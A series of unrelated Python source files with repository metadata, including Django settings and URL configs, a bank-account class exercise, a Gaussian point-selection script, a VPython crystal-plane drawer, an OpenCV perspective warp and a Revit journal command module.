zhoupan@xiaomi.com
|
372f46dad7b60491c664fde59a99f02860e7818f
|
1ef37198c843b132b79e00896eea9488d2faefb0
|
/setup.py
|
f7be1facab9cceca93acc774fc86817ad239328e
|
[
"MIT"
] |
permissive
|
tof-tof/dazzler
|
8db91a101262459b0111596227dc8b506dcf6e05
|
97da75c77b07c70b246845da59ae81099014d313
|
refs/heads/master
| 2023-07-15T13:50:22.295700
| 2021-08-22T01:42:52
| 2021-08-22T01:53:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from setuptools import setup
setup(
extras_require={
'redis': ['aioredis==1.3.1'],
'electron': [
'PyInstaller==4.5.1'
]
}
)
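# Illustrative install commands for the extras above (the distribution name is an
# assumption; setup() does not declare one here):
#   pip install dazzler[redis]     # adds aioredis 1.3.1
#   pip install dazzler[electron]  # adds PyInstaller 4.5.1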
|
[
"t4rk@outlook.com"
] |
t4rk@outlook.com
|
a283a5082e8e1466582c94eb0653039c4af506ea
|
23a0b40ede110cb719d86f04843a7a7604160d96
|
/OOP_Project/BankingSystem.py
|
39dcbe7480c3e6c8666370cd21ec000771a39960
|
[] |
no_license
|
Thestrle/Python_Begginer
|
28704312412554050347fb2b328bda0d65c38006
|
1ed1a8863d96c3a9181a7f580490ee5c01088c41
|
refs/heads/master
| 2022-11-11T09:59:51.342183
| 2020-06-27T06:02:29
| 2020-06-27T06:02:29
| 254,622,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 720
|
py
|
class BankAccount():
#Class variables can be declared here directly
#account_type = "Savings"
def __init__(self,owner,balance):
self.owner = owner
self.balance = balance
def __str__(self):
return f'{self.owner},{self.balance}'
def deposit(self,money):
self.balance = self.balance + money
return f'Deposit completed New balance is {self.balance}'
def withdraw(self,money):
if money <= self.balance:
self.balance = self.balance - money
return f'Withdraw accepted. New balance is {self.balance}'
else:
return "Not enough funds available"
acc1 = BankAccount("Alok",500)
out1 = acc1.deposit(500)
print(out1)
out2 = acc1.withdraw(800)
print(out2)
|
[
"kushvahaalok@gmail.com"
] |
kushvahaalok@gmail.com
|
26cb9755a2b3d143583f169a35aafc0b914b2430
|
21d1fed4983ca3a5b6d9d267ef18da91c5e024f1
|
/lambda2/config.py
|
f920174a1991fb35be74ae913bb687402c9794b1
|
[] |
no_license
|
xxlv/lambda2
|
53abcf2dfcf075f7cbd1872fd0ae6d76c24f8427
|
c8c1e67106659225fa159d687b8733efcd6f9724
|
refs/heads/master
| 2020-05-22T11:44:41.517879
| 2017-09-20T03:18:35
| 2017-09-20T03:18:35
| 84,695,657
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
# -* coding: utf-8 -*-
import yaml
class Config():
@staticmethod
def load_config():
# safe_load avoids constructing arbitrary Python objects, and the
# context manager closes the file handle
with open('./conf/server.yml') as f:
return yaml.safe_load(f)
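# Illustrative usage (assumes ./conf/server.yml exists relative to the working directory):
#   conf = Config.load_config()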
|
[
"lvxx@dxyer.com"
] |
lvxx@dxyer.com
|
39353b03529e7f64d5481fcb2d4fd5b29a6ec241
|
f28d6f0acb6623703ce892e25b591e98281accdf
|
/mytestsite/urls.py
|
ce3c9383d6e92ad6d0e6658795a53b1414882632
|
[] |
no_license
|
mapourmand/DjangoSimpleApp
|
828fc64e1c37d154f98205ad20ac63ecbf3e55cd
|
f8b0c8aa4d77a988f86a3cbf8203d7c104918bcf
|
refs/heads/master
| 2021-09-19T10:41:11.968210
| 2018-07-27T07:23:41
| 2018-07-27T07:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 880
|
py
|
"""mytestsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('list/', include('list.urls')),
]
from django.views.generic import RedirectView
urlpatterns += [
path('', RedirectView.as_view(url='/list/')),
]
|
[
"pourmand.mhd@gmail.com"
] |
pourmand.mhd@gmail.com
|
838d56a16201eeb4f9732f091b9481f02e280b30
|
33836016ea99776d31f7ad8f2140c39f7b43b5fe
|
/fip_collab/2017_02_08_HCF_pearson/toy_problem/select_gaussian_pts_7.py
|
213ef7dc3105575a0ee637610c363bbb0f96ecb2
|
[] |
no_license
|
earthexploration/MKS-Experimentation
|
92a2aea83e041bfe741048d662d28ff593077551
|
9b9ff3b468767b235e7c4884b0ed56c127328a5f
|
refs/heads/master
| 2023-03-17T23:11:11.313693
| 2017-04-24T19:24:35
| 2017-04-24T19:24:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,079
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors.kde import KernelDensity
from scipy.stats import norm
def normal(X):
return np.exp(-0.5*X**2)/np.sqrt(2*np.pi)
def getdensKDE(X, X_, bw):
kde = KernelDensity(kernel='gaussian', bandwidth=bw).fit(X[:, np.newaxis])
Adens = np.exp(kde.score_samples(X_[:, np.newaxis]))
Ndens = normal(X_)
return Adens, Ndens
xmin = -3
xmax = 3
npts = 1000
nsel = 100
mutgt = 1
sigtgt = 0.7
"""generate random points with uniform distribution"""
Xorig = np.random.uniform(low=xmin, high=xmax, size=npts)
# """generate gaussian random points"""
# Xorig = np.random.normal(loc=0, scale=2, size=npts)
# """generate uniformly distributed points"""
# Xorig = np.linspace(xmin, xmax, npts)
Xorig = np.sort(Xorig)
X = Xorig
plt.figure(1)
target_d = norm.pdf(Xorig, loc=mutgt, scale=sigtgt)
plt.plot(Xorig, target_d, 'r-')
maxdens = target_d.max()
# """select closest nsel points to mutgt"""
# dist = np.abs(X-mutgt)
# tmp = np.argsort(dist)[:nsel]
"""randomly select nsel points"""
tmp = np.zeros((npts,), dtype='bool')
tmp[:nsel] = 1
np.random.shuffle(tmp)
sel = X[tmp]
sel = np.sort(sel)
print "current mu: " + str(sel.mean())
print "current sig: " + str(sel.std())
"""remove selected points from X"""
X = np.delete(X, tmp)
Adens = norm.pdf(Xorig, loc=sel.mean(), scale=sel.std())
plt.plot(Xorig, Adens, 'b-')
"""iterate and try and improve the fit"""
"""find the maximum differences between the histogram and target probability
densities"""
olderr = 1.
# for ii in xrange(X.size):
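# Each pass swaps one selected point from a region where the fitted density
# overshoots the target for an unselected point from a region where it falls
# short, keeping the best selection seen so far (smallest normalised max error).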
for ii in xrange(100):
# if np.mod(ii, 5) == 0:
# # plt.plot(Xorig, y, 'r-')
# # plt.plot(sel, 0*np.ones(sel.shape), 'k.')
# plt.plot(Xorig, Adens, 'k-', alpha=0.5)
# # plt.show()
err = Adens - target_d
newerr = np.max(np.abs(err))/maxdens
if newerr < olderr:
selbest = np.sort(sel)
olderr = newerr
"""remove point in sel closest to location of max error and add
point from the original distribution with the miniumum error"""
"""add a bit of noise to this calculation"""
tmp = np.arange(err.size)[err > 0]
tmp = tmp[np.random.random_integers(0, tmp.size-1)]
tmpmax = np.argmin(np.abs(sel-Xorig[tmp]))
tmp = np.arange(err.size)[err < 0]
tmp = tmp[np.random.random_integers(0, tmp.size-1)]
tmpmin = np.argmin(np.abs(X-Xorig[tmp]))
# tmpmax = np.argmin(np.abs(sel-Xorig[np.argmax(err)]))
# tmpmin = np.argmin(np.abs(X-Xorig[np.argmin(err)]))
# print ii
# print sel[tmpmax]
# print X[tmpmin]
oldv = sel[tmpmax]
sel[tmpmax] = X[tmpmin]
sel = np.sort(sel)
X = np.delete(X, tmpmin)
X = np.append(X, oldv)
# print X.size
Adens = norm.pdf(Xorig, loc=sel.mean(), scale=sel.std())
print np.unique(selbest).size
Adens = norm.pdf(Xorig, loc=selbest.mean(), scale=selbest.std())
plt.plot(selbest, -0.05*np.ones(selbest.shape), 'k.')
plt.plot(Xorig, Adens, 'k-')
print "current mu: " + str(selbest.mean())
print "current sig: " + str(selbest.std())
plt.show()
|
[
"noahhpaulson@gmail.com"
] |
noahhpaulson@gmail.com
|
0935e146885b5a29f3f4ac80dd1ad035d219413a
|
4743e9857a48f20a5a9edc294e2ab92256ab47b4
|
/backend/smart_odberne_miest_23193/settings.py
|
b4d13e011230e4cdf9f69364961a30214a412766
|
[] |
no_license
|
crowdbotics-apps/smart-odberne-miest-23193
|
6122e0204c3a83027b575d1119f16454815895e1
|
e826b7a1d16bdc590f9e7c8a5ad4230be791b0f6
|
refs/heads/master
| 2023-01-30T12:47:39.281749
| 2020-12-04T16:30:08
| 2020-12-04T16:30:08
| 318,573,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,066
|
py
|
"""
Django settings for smart_odberne_miest_23193 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.sites",
"healthcare",
]
LOCAL_APPS = [
"home",
"users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
"rest_framework",
"rest_framework.authtoken",
"rest_auth",
"rest_auth.registration",
"bootstrap4",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"drf_yasg",
"storages",
# start fcm_django push notifications
"fcm_django",
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "smart_odberne_miest_23193.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "smart_odberne_miest_23193.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
and AWS_STORAGE_BUCKET_NAME
and AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = "/mediafiles/"
MEDIA_ROOT = os.path.join(BASE_DIR, "mediafiles")
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning(
"You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fa73eb76aa270675a2adadf1b640c4548ac27b05
|
03e455add23431487a88bc8a0965aee0cb535171
|
/cubicplane.py
|
13958913423e0337f74e91553b30ba22a85b72d0
|
[] |
no_license
|
animator/Crystosim_Techkriti
|
c20193b098d236b9ce3823c41b57d3bd2592c874
|
3f154b02541eb80f5d0631534c3c2daca78116ce
|
refs/heads/master
| 2021-01-18T07:40:22.594062
| 2012-01-28T10:12:38
| 2012-01-28T10:12:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,297
|
py
|
from visual import *
def drawborder(list1,list2,list3):
l=paths.line(start=list1,end=list2)
curve(pos=l.pos,color=color.yellow)
l1=paths.line(start=list2,end=list3)
curve(pos=l1.pos,color=color.yellow)
l2=paths.line(start=list3,end=list1)
curve(pos=l2.pos,color=color.yellow)
def drawborder1(list1,list2,list3,list4):
l=paths.line(start=list1,end=list2)
curve(pos=l.pos,color=color.yellow)
l1=paths.line(start=list2,end=list3)
curve(pos=l1.pos,color=color.yellow)
l2=paths.line(start=list3,end=list4)
curve(pos=l2.pos,color=color.yellow)
l3=paths.line(start=list4,end=list1)
curve(pos=l3.pos,color=color.yellow)
def drawline(list1,list2):
l=paths.line(start=list1,end=list2,np=2)
curve(pos=l.pos)
return
def sc(x,y,z,l,w,h,a,b,c):
if x==l and y==w and z==h:
return
if x<l and y<w and z<h:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y+b,z])
drawline([x,y,z],[x,y,z+c])
if x==l and y==w :
drawline([x,y,z],[x,y,z+c])
return
if x==l and z==h:
drawline([x,y,z],[x,y+b,z])
return
if y==w and z==h:
drawline([x,y,z],[x+a,y,z])
return
if x==l:
drawline([x,y,z],[x,y+b,z])
drawline([x,y,z],[x,y,z+c])
if y==w:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y,z+c])
if z==h:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y+b,z])
return
def hcf(a,b):
# greatest common divisor via the Euclidean algorithm; used below to reduce
# the Miller indices (h, k, l) to lowest terms
while b:
a, b = b, a % b
return a
def main(a,b,c,h,k,l1):
list=[[0,0,0]]
for x in range(0,2*a,a):
for y in range(0,2*b,b):
for z in range(0,2*c,c):
sc(x,y,z,a,b,c,a,b,c)
# s=sphere(pos=(x,y,z),radius=p*r)
line1=paths.line(start=(0,0,0),end=(2*a,0,0),np=2)
curve(pos=line1.pos,color=color.blue)
line1=paths.line(start=(0,0,0),end=(0,2*b,0),np=2)
curve(pos=line1.pos,color=color.red)
line1=paths.line(start=(0,0,0),end=(0,0,2*c),np=2)
curve(pos=line1.pos,color=color.cyan)
if (h==0 and k==0):
faces(pos=[(0,0,0),(0,0,c),(a,0,c)],color=color.cyan)
faces(pos=[(a,0,c),(0,0,c),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(a,0,0),(a,0,c)],color=color.cyan)
faces(pos=[(a,0,c),(a,0,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[0,0,c],[a,0,c],[a,0,0])
return
if (k==0 and l1==0):
faces(pos=[(0,0,0),(0,b,0),(a,b,0)],color=color.cyan)
faces(pos=[(a,b,0),(0,b,0),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(a,0,0),(a,b,0)],color=color.cyan)
faces(pos=[(a,b,0),(a,0,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[a,0,0],[a,b,0],[0,b,0])
return
if (h==0 and l1==0):
faces(pos=[(0,0,0),(0,0,c),(0,b,c)],color=color.cyan)
faces(pos=[(0,b,c),(0,0,c),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(0,b,0),(0,b,c)],color=color.cyan)
faces(pos=[(0,b,c),(0,b,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[0,b,0],[0,b,c],[0,0,c])
return
if (h==0):
m=hcf(abs(k),abs(l1))
k=k*1.0/m
l1=l1*1.0/m
#k=k*1.0/m
#l1=l1*1.0/m
k=b*1.0/k
l1=c*1.0/l1
faces(pos=[(0,k,0),(a,k,0),(a,0,l1)],color=color.cyan)
faces(pos=[(a,0,l1),(a,k,0),(0,k,0)],color=color.cyan)
faces(pos=[(0,k,0),(0,0,l1),(a,0,l1)],color=color.cyan)
faces(pos=[(a,0,l1),(0,0,l1),(0,k,0)],color=color.cyan)
drawborder1([0,0,l1],[0,k,0],[a,k,0],[a,0,l1])
return
if (k==0):
m=hcf(abs(h),abs(l1))
h=h*1.0/m
l1=l1*1.0/m
# h=1.0/h
# l1=1.0/l1
h=a*1.0/h
l1=c*1.0/l1
faces(pos=[(h,0,0),(h,b,0),(0,b,l1)],color=color.cyan)
faces(pos=[(0,b,l1),(h,b,0),(h,0,0)],color=color.cyan)
faces(pos=[(h,0,0),(0,0,l1),(0,b,l1)],color=color.cyan)
faces(pos=[(0,b,l1),(0,0,l1),(h,0,0)],color=color.cyan)
drawborder1([h,0,0],[0,0,l1],[0,b,l1],[h,b,0])
#drawborder([h,0,0],[0,b,0],[h,0,l1])
return
if (l1==0):
m=hcf(abs(h),abs(k))
h=h*1.0/m
k=k*1.0/m
h=a*1.0/h
k=b*1.0/k
faces(pos=[(h,0,0),(0,k,0),(0,k,c)],color=color.cyan)
faces(pos=[(0,k,c),(0,k,0),(h,0,0)],color=color.cyan)
faces(pos=[(0,k,c),(h,0,c),(h,0,0)],color=color.cyan)
faces(pos=[(h,0,0),(h,0,c),(0,k,c)],color=color.cyan)
drawborder1([h,0,0],[0,k,0],[0,k,c],[h,0,c])
#drawborder([h,0,c],[0,0,c],[h,k,0])
return
#print m
m1=hcf(abs(h),abs(k))
m2=hcf(abs(k),abs(l1))
m=hcf(abs(m1),abs(m2))
# m=min(m1,m2,m3)
h=h*1.0/m
k=k*1.0/m
l1=l1*1.0/m
h=a*1.0/h
k=b*1.0/k
l1=c*1.0/l1
faces(pos=[(h,0,0),(0,k,0),(0,0,l1)],color=color.cyan)
faces(pos=[(0,0,l1),(0,k,0),(h,0,0)],color=color.cyan)
drawborder([h,0,0],[0,k,0],[0,0,l1])
return
#main(1,1,1,2,3,0)
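A minimal usage sketch for the module above, assuming VPython's `visual` module is installed; as in the commented-out call, the arguments are the cell edge lengths a, b, c followed by the Miller indices h, k, l:

main(2, 3, 4, 1, 1, 1)  # shade the (1 1 1) plane of a 2x3x4 cell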
|
[
"ashita92@rediffmail.com"
] |
ashita92@rediffmail.com
|
810d5b88dd8110a1cbec9f2d913ef8cf91aaeebe
|
1d2bbeda56f8fede69cd9ebde6f5f2b8a50d4a41
|
/medium/python3/c0258_525_contiguous-array/00_leetcode_0258.py
|
0cbadf559161562e4c1aba24f1de80d4ed841781
|
[] |
no_license
|
drunkwater/leetcode
|
38b8e477eade68250d0bc8b2317542aa62431e03
|
8cc4a07763e71efbaedb523015f0c1eff2927f60
|
refs/heads/master
| 2020-04-06T07:09:43.798498
| 2018-06-20T02:06:40
| 2018-06-20T02:06:40
| 127,843,545
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#525. Contiguous Array
#Given a binary array, find the maximum length of a contiguous subarray with equal number of 0 and 1.
#Example 1:
#Input: [0,1]
#Output: 2
#Explanation: [0, 1] is the longest contiguous subarray with equal number of 0 and 1.
#Example 2:
#Input: [0,1,0]
#Output: 2
#Explanation: [0, 1] (or [1, 0]) is a longest contiguous subarray with equal number of 0 and 1.
#Note: The length of the given binary array will not exceed 50,000.
#class Solution:
# def findMaxLength(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# Time Is Money
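# A sketch of one standard approach to fill in the template above (a common
# prefix-sum solution, not necessarily the intended one): treat each 0 as -1
# and record the first index at which every running sum appears; a repeated
# sum means the slice between the two indices is balanced.
class Solution:
    def findMaxLength(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        first_seen = {0: -1}  # running sum -> earliest index it occurred at
        total = best = 0
        for i, n in enumerate(nums):
            total += 1 if n == 1 else -1  # count 0s as -1
            if total in first_seen:
                best = max(best, i - first_seen[total])
            else:
                first_seen[total] = i
        return best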
|
[
"Church.Zhong@audiocodes.com"
] |
Church.Zhong@audiocodes.com
|
62c93e17f98983d6cb6ea5d285442b221d590658
|
561accc0e4997f906134fed6c95ef60f17ae5f72
|
/drive_car/__init__.py
|
29fde3052f99244a8d7432b842fc0e369f411fcf
|
[] |
no_license
|
RRRK-Malla/my_gym_env
|
73d30668b66dce0d488b2d71616e130e72849786
|
e7a683c5ac733e071298e6663f6799def5602901
|
refs/heads/main
| 2023-05-10T18:29:29.817109
| 2021-06-02T12:12:16
| 2021-06-02T12:12:16
| 372,929,654
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 121
|
py
|
from gym.envs.registration import register
register(
id='Drivezy-v0',
entry_point='my_gym_env.envs:DriveEnv',
)
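A brief usage sketch, assuming this file is `drive_car/__init__.py` (as its repo path suggests), that the entry point `my_gym_env.envs:DriveEnv` is importable, and the classic gym API in which `reset()` returns only the observation:

import gym
import drive_car  # noqa: F401 -- importing this package runs register() above

env = gym.make('Drivezy-v0')
obs = env.reset()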
|
[
"noreply@github.com"
] |
RRRK-Malla.noreply@github.com
|
2b863af19654c99e670c201cd7b45dc9fe4d57f7
|
e87dd89621f163902a7c8c0a318f9b7af71182d8
|
/CV_proj3/AXL1800151.py
|
663c4034556b3e779ccab8d607a6f4cc0956a732
|
[] |
no_license
|
shadowjljp/Computer_Viision-master
|
d2d375d903954339d73d1091cb547ce4e140ea83
|
9534bb686fc736a2af33f2691821dfdc3e037cbc
|
refs/heads/master
| 2022-11-24T10:54:37.820923
| 2020-07-25T20:42:33
| 2020-07-25T20:42:33
| 282,521,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
import math
import cv2
import numpy as np
import sys
# read arguments
from cv2.cv2 import cvtColor
if (len(sys.argv) != 8):
print(sys.argv[0], ": takes 7 arguments. Not ", len(sys.argv) - 1)
print("Example:", sys.argv[0], "fruits.jpg 0 0.001 1 1 0 0 ")
sys.exit()
name_input = sys.argv[1]
f = float(sys.argv[2])
u0 = float(sys.argv[3])
v0 = float(sys.argv[4])
a = float(sys.argv[5])
b = float(sys.argv[6])
c = float(sys.argv[7])
inputImage = cv2.imread(name_input, cv2.IMREAD_COLOR)
# M=np.zeros([3,3],dtype=np.uint8)
# M[2]=c(u-u0)
rows, cols, band = inputImage.shape
def perspectiveTransform():
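    # maps the corners of a 100x100 reference square through the pinhole model
    # u' = c*(u - u0) / (f - a*(u - u0) - b*(v - v0)) (and likewise for v'),
    # then fits the homography between the original and projected corners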
# pts1 = np.float32([[rows * 0.25, cols * 0.25], [rows * 0.75, cols * 0.25], [rows * 0.25, cols * 0.75],
# [rows * 0.75, cols * 0.75]])
pts1 = np.float32([[0, 0], [100, 0], [100, 100], [0, 100]])
X0 = []
Y0 = []
for i in range(4):
X0.append((c * (pts1[i][0] - u0)) / (f - a * (pts1[i][0] - u0) - b * (pts1[i][1] - v0)))
        Y0.append((c * (pts1[i][1] - v0)) / (f - a * (pts1[i][0] - u0) - b * (pts1[i][1] - v0)))
# print(X0)
pts2 = np.float32([[X0[0], Y0[0]], [X0[1], Y0[1]], [X0[2], Y0[2]], [X0[3], Y0[3]]])
M = cv2.getPerspectiveTransform(pts1, pts2)
print('M= ', M)
return M
M = perspectiveTransform()
inputImage = cv2.warpPerspective(inputImage, M, (inputImage.shape[1], inputImage.shape[0]))
cv2.imshow("Perspective projection", inputImage)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"40411574+shadowjljp@users.noreply.github.com"
] |
40411574+shadowjljp@users.noreply.github.com
|
5d7790dc0aedd550553acaf377d461a7dbaec9a1
|
19712eead5dd2ca4d7616d401a53dc1a192ab258
|
/commands/warnings/__init__.py
|
bf4ca626085af98394f063d57d7a4e0a718f3249
|
[
"MIT"
] |
permissive
|
sunjini/rvt_model_services
|
8bf18e8b26372daac996622feb5e99f1a55d1a93
|
f95d89a7a5696276e1ef22924e6981f083ffa7bc
|
refs/heads/master
| 2020-09-17T12:40:17.077677
| 2019-06-24T06:25:47
| 2019-06-24T06:25:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
import rjm
import os
import os.path as op
from . import bokeh_warnings_graphs
def cmd_journal(project_code, model_path, jrn_path, com_dir, log_dir):
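    # builds a Revit journal that opens the model detached and audited, replays
    # the export-warnings dialog commands from override_jrn_command below, and
    # closes the model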
warnings_dir = op.join(op.dirname(com_dir), "warnings" + os.sep)
rvt_jrn = rjm.JournalMaker()
rvt_jrn.open_workshared_model(model_path=model_path, detached=True, audit=True)
rvt_jrn.add_custom_entry(override_jrn_command.format(warnings_dir, project_code))
rvt_jrn.close_model()
rvt_jrn.write_journal(jrn_path)
override_jrn_command = """ Jrn.RibbonEvent "TabActivated:Manage"
Jrn.Command "Ribbon" , "Review previously posted warnings , ID_REVIEW_WARNINGS"
Jrn.Data "Error dialog" , "0 failures, 0 errors, 0 warnings"
Jrn.PushButton "Modeless , Autodesk Revit Architecture 2016 , Dialog_Revit_ReviewWarningsDialog" _
, "Export..., Control_Revit_ExportErrorReport"
Jrn.Data "Error Report Action" , "IDOK"
Jrn.Data "Error Report File Path" , "{0}"
Jrn.Data "Error Report File Name" , "{1}"
Jrn.Data "Error Report File Format" , "html"
Jrn.PushButton "Modeless , Autodesk Revit Architecture 2016 , Dialog_Revit_ReviewWarningsDialog" , "Close, IDABORT"
"""
register = {"name": "warnings",
"rjm": cmd_journal,
"optional_html_path": True,
